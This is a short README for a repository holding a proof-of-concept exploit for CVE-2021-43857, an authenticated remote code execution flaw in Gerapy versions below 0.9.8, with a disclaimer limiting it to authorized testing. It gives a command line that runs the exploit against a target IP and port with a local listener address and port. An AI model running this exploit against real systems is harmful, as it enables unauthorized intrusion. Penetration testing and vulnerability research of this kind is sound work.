
Proof of Concept exploit for CVE‑2021‑43857: Authenticated Remote Code Execution in Gerapy (<0.9.8). Updated and automated version of the original Exploit‑DB PoC for educational and authorized testing purposes only.
This repository contains a proof of concept exploit for CVE-2021-43857,
a Remote Code Execution vulnerability affecting Gerapy < 0.9.8.
This is an updated version of the original Exploit-DB PoC,
with bug fixes and automation for easier reproduction in authorized testing environments.
⚠️ Disclaimer:
This code is published for educational and authorized penetration testing only.
Do not use against systems without explicit permission.
The author takes no responsibility for misuse.
python3 exploit.py -t <TARGET_IP> -p <TARGET_PORT> -L <LOCAL_IP> -P <LOCAL_PORT>